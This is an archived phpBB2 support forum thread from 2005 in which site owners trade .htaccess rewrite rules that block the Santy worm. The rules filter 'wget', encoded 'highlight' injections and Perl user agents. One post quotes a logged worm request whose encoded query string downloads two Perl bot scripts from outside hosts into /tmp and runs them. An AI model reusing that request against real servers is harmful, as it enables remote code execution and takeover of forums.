Apache forbidden rule for Santy.A worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
User avatar
Joe User
Registered User
Posts: 71
Joined: Mon Sep 13, 2004 9:56 am
Location: Germany
Name: Markus Kohlmeyer
Contact:

Post by Joe User » Fri Jan 07, 2005 8:56 pm

The [R,L] results in a 302 response...

john_r
Registered User
Posts: 19
Joined: Thu Nov 18, 2004 8:11 pm

Post by john_r » Fri Jan 07, 2005 9:05 pm

Hi

Yes know that, but why should it only send some lines to 302 and others get 200.

After last post changed .htaccess to

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ http://127.0.0.1 [R,L]

and later checking my logs, see that requests to

/phpbb/posting.php
/phpbb/profile.php
/phpbb/privmsg.php

Still get re-routed ie 302 All other requests get 200

So have banned those lines in the robots txt

but would like to know why only those requests get re-routed

Rgds

Taipo
Registered User
Posts: 174
Joined: Fri Jan 07, 2005 9:25 pm
Contact:

Post by Taipo » Fri Jan 07, 2005 11:02 pm

Why focus on the occurance of 'highlight=%2527' in a GET request string when it is in fact the occurance of '%2527' alone that is of concern. As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get thru the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='

bmer
Registered User
Posts: 142
Joined: Sun Dec 07, 2003 10:36 pm

Post by bmer » Sat Jan 08, 2005 8:24 am

Taipo wrote: Why focus on the occurance of 'highlight=%2527' in a GET request string when it is in fact the occurance of '%2527' alone that is of concern. As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get thru the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='


You guys are all talking a foreign language to me. :lol:

Here is my problem. I upgraded my forum to 2.0.11 and it seemed to cut down on guest access, but I still have around 4-10 guests all the time yet. My host is running PHP 4.3.10. I tired adding that .htaccess file at the top of this post, but get a critical error. This is driviing me nuts. My host isn't much help. What can I do? Can someone help? I get dizzy reading through all these posts. :lol:

User avatar
px1369
Registered User
Posts: 42
Joined: Tue Aug 13, 2002 4:37 pm

Post by px1369 » Mon Jan 10, 2005 3:53 pm

I just want to confirm that this htaccess modification will fix my troubles?

Code: Select all

RewriteEngine On 

# prevent access from santy webworm a-e 
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR] 
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

# prevent pre php 4.3.10 bug 
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b 
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

# prevent perl user agent (most often used by santy) 
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC] 
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
I have had several hundred diferrent IPs attempt to access my server and one account that has thousands of visitors daily is still receiving these:

Code: Select all

/viewtopic.php?t=125&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1

Code: Select all

Mod_Security-Message:
Access denied with code 406. Pattern match "wget " at THE_REQUEST.
Thanx
I am, therefore I think.
I think, therefore I am.
Therefore I think I am?

User avatar
Mikalee
Registered User
Posts: 42
Joined: Thu Apr 10, 2003 3:48 pm
Contact:

Post by Mikalee » Tue Jan 11, 2005 10:11 pm

[Edit - problem corrected, server issue]
Last edited by Mikalee on Fri Jan 21, 2005 7:31 pm, edited 1 time in total.
Image

jsprague
Registered User
Posts: 21
Joined: Tue Aug 05, 2003 3:07 am
Location: Oregon
Contact:

Post by jsprague » Thu Jan 13, 2005 8:12 am

Hello,

Just wondering what the following code listed in the .htaccess examples will do..

Code: Select all

RewriteRule ^.*$ http://127.0.0.1/ [R,L]
What does this line do?

Thanks![/quote]

User avatar
Joe User
Registered User
Posts: 71
Joined: Mon Sep 13, 2004 9:56 am
Location: Germany
Name: Markus Kohlmeyer
Contact:

Post by Joe User » Thu Jan 13, 2005 9:53 am

jsprague wrote:

Code: Select all

RewriteRule ^.*$ http://127.0.0.1/ [R,L]
What does this line do?


It redirects the requests back to the sourcesystem ;)

FuZiWuZi
Registered User
Posts: 82
Joined: Fri Sep 13, 2002 3:21 pm
Location: Belgium (Brussels)
Contact:

Post by FuZiWuZi » Sat Jan 22, 2005 10:26 am

Hello,

If I buy a new hosting and download a new version of phpbb do I have to run the patch for this worm? Or is it already done?

thx,
Fuz
Hello folks!!

-=ORC_The_Dude=-
Registered User
Posts: 40
Joined: Mon Oct 18, 2004 5:09 pm

Post by -=ORC_The_Dude=- » Sat Jan 22, 2005 3:55 pm

-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


win98se supports *.htaccess extension. It doesn't allow me renaming a file as .htaccess without anything before the dot



but no one answers the question...

is it possible to get one file in a zip containing .htaccess file it self. ...???
have you READ this topic...http://www.phpbb.com/phpBB/viewtopic.php?t=128123
Babe, you're acting like I have cheated on you, and I have never cheated on you. Except for that one time, with myself, and you caught me.

Psychotic_Carp
Registered User
Posts: 556
Joined: Fri Dec 03, 2004 1:45 pm

Post by Psychotic_Carp » Sun Jan 23, 2005 3:08 am

-=ORC_The_Dude=- wrote:
-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


win98se supports *.htaccess extension. It doesn't allow me renaming a file as .htaccess without anything before the dot



but no one answers the question...

is it possible to get one file in a zip containing .htaccess file it self. ...???


try this

there is already a .htaccess file in your phpbb folder (cache folder)

download it to your desktop make notpad open it or get the html kit (google it) paste in the code and save it, then upload it where you want it


what i want to know is what is the best code to currently use? and what folders are the best to use? (replace the one in the cache folder? and can i place the file in multiple locations?

damiel
Registered User
Posts: 12
Joined: Wed Dec 22, 2004 3:35 pm
Location: Frontios

Post by damiel » Mon Jan 24, 2005 6:05 pm

whit wrote: You could probably get away with:

Code: Select all

RewriteEngine On 
RewriteBase / 

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$        -       [F,L]   
The highlight line catches I think all the variants of Santy I've logged. The next catches all the attempts to at custom hacks from Perl I've seen so far (everything starting with LWP or lwp - the "NC" means "no case"). You can at the very least get rid of all the LWP and lwp lines but that one.


I realized today that my forum was being hit by these stupid worms (far too many "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel

damiel
Registered User
Posts: 12
Joined: Wed Dec 22, 2004 3:35 pm
Location: Frontios

Post by damiel » Mon Jan 24, 2005 6:31 pm

BTW, in case anyone cares, I write .htaccess scripts in Windows by uploading the file as htaccess.txt (or, really, any extension doesn't make a difference). Then, while in FTP, I rename the file as .htaccess.

It's really simple.

Damiel

damiel
Registered User
Posts: 12
Joined: Wed Dec 22, 2004 3:35 pm
Location: Frontios

Post by damiel » Mon Jan 24, 2005 6:33 pm

BTW, in case anyone cares, I write .htaccess scripts in Windows by uploading the file as htaccess.txt (or, really, any extension doesn't make a difference). Then, while in FTP, I rename the file as .htaccess.

It's really simple.

Damiel

jsundqui
Registered User
Posts: 40
Joined: Thu Apr 29, 2004 2:25 am

Post by jsundqui » Mon Jan 24, 2005 7:53 pm

damiel wrote: I realized today that my forum was being hit by these stupid worms (far too many "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel


It seems the worms kicked it up a notch today at my site as well. I did the modrewrite changes to .htaccess a while ago so they all get 403'd, but I was only getting worm attempts every few minutes or so, and from what seemed to be hijacked cable/DSL home lusers. But today it has cranked up to every 10 seconds or so, and seem to be coming from hosting outfits. This all based on unscientific sampling of IPs to lookup. But the hit rate is definitely a huge spike today.

BTW, I've been getting some users registering from Russia that seem intent on breaking in. They got in a while ago, probably by reading config.php before I upgraded to 2.0.11 (and I had the same password for the db as the site - since changed) (curiously, site was not defaced as was done with other santy attacks, although my portal page was eventually hacked, no other files deleted, though). But it is curious that they needed to sign up as users to do this. Is there another crack out there not yet discovered or reported?

Locked

Return to “2.0.x Support Forum”